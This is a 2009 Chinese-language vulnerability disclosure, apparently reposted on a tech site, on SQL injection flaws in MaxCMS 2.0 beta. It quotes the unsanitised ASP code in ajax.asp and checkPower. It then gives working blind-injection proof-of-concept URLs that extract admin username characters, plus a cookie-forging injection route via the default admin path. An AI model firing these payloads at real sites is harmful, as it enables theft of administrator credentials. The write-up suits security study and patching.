马克斯CMS2.0beta (maxcms)SQL注入漏洞

作者:flyh4t 来源:wolvez.org 时间:2009-02-17 12:58:00 

这个系统是国内非常流行的视频点播系统,之前的1.5版本漏洞非常多,2.0版本在安全方面有所提高,但是依然有漏洞存在。

看代码

\inc\ajax.aspdim action : action = getForm("action", "get")response.Charset="gbk"Select  case action    case "newslist" : viewNewsList    case "newscontent" : viewNewsContent    case "digg","tread" : scoreVideo(action)    case "reporterr" : reportErr    case "hit" : updateHit    case else : mainEnd SelectterminateAllObjects……Sub scoreVideo(operType)    dim sql,id,digg,returnValue : id=getForm("id","get")    ‘通过get方式获取id的值    if rCookie("maxcms2_score"&id)="ok" then die "havescore"    if isNul(id) then die "err"    'on error resume next    digg=conn.db("select m_digg from {pre}data where m_id="&id,"execute")(0)    ‘ 参数id,没有过滤就带入sql语句进行查询    if err then digg=0 : err.clear()    if not isNum(id) then echoSaveStr "safe" else id=clng(id)    ‘ 查询到digg,注意返回的内容……

利用就很简单了,构造sql语句提交(默认结构是m_manager,m_username,m_pwd,根据返回的内容判断就可以了。如果构造的语句是正确的,就返回类似警告

你提交的数据有非法字符,你的IP【xxxx】已被记录,操作

构造的语句不正确,则返回500
Poc :

正确的:http://demo.maxcms.net/inc/ajax.asp?action=digg&id=1%20and%20(select%20top%201%20asc(mid(m_username,1,1))%20from%20m_manager)=97不正确的:http://demo.maxcms.net/inc/ajax.asp?action=digg&id=1%20and%20(select%20top%201%20asc(mid(m_username,1,1))%20from%20m_manager)=99

其实随便找个注射工具跑一下就ok了

另外一处注射

Sub checkPower    dim loginValidate,rsObj : loginValidate = "maxcms2.0"    err.clear    on error resume next    set rsObj=conn.db("select m_random,m_level from {pre}manager where m_username='"&rCookie("m_username")&"'","execute")    loginValidate = md5(getAgent&getIp&rsObj(0))    if err then wCookie "check"&rCookie("m_username"),"" : die "<script>top.location.href='index.asp?action=login';</script>"    if rCookie("check"&rCookie("m_username"))<>loginValidate then wCookie "check"&rCookie("m_username"),"" : die "<script>top.location.href='index.asp?action=login';</script>"    checkManagerLevel  rsObj(1)    set rsObj=nothingEnd Sub

其中

Function rCookie(cookieName)    rCookie = request.cookies(cookieName)End Function

通过伪造cookie中m_username的值可以进行注射

不过要知道后台管理目录,默认是/admin/,多个页面可以触发改函数
比如 /admin/admin_ajax.asp

标签:maxcms,SQL,Injection,漏洞
0
投稿

猜你喜欢

  • Linux系统下发送Email的C语言代码

    2010-03-12 18:58:00
  • phpcms黄页个人求职列表标签调用会员学历的方法

    2009-02-13 17:23:00
  • Linux chkconfig 命令的使用

    2023-09-01 10:25:37
  • 安装Windows 2000十大注意事项

    2007-10-11 15:41:00
  • 淘宝技术发展(引言)

    2012-03-05 20:07:29
  • 百度排名公式最新版

    2008-01-10 20:16:00
  • 典型DoS攻击原理及抵御措施

    2009-09-19 20:15:00
  • 解决IIS下UTF-8文件报错乱码的问题

    2008-08-22 13:47:00
  • Win2003下IIS6环境,无法上传超过200KB文件的解决方法

    2010-08-12 19:03:00
  • SEO的外链建设相关性详细分析

    2009-01-08 15:59:00
  • 网站对于301、404错误的处理

    2009-01-15 09:21:00
  • Linux文件服务器实战详解(虚拟用户)

    2023-08-07 06:10:47
  • seo第一站:网站诊断与分析

    2007-10-25 11:49:00
  • WordPress 插件——AlexaRank

    2009-02-12 12:24:00
  • apache服务出现Forbidden 403问题的解决方法总结

    2023-08-25 21:39:21
  • Discuz! 7.0到Discuz! 7.1升级图文教程

    2009-10-23 18:01:00
  • 教你打造不一样的美图秀秀欢迎首页

    2009-10-10 16:24:00
  • php查询Oracle 数据

    2010-12-14 15:04:00
  • Linux下alias命令的用法详解

    2021-11-17 04:35:11
  • 对于站长来说 最可悲的莫过于选择放弃

    2008-10-28 20:53:00
  • asp之家 网站运营 m.aspxhome.com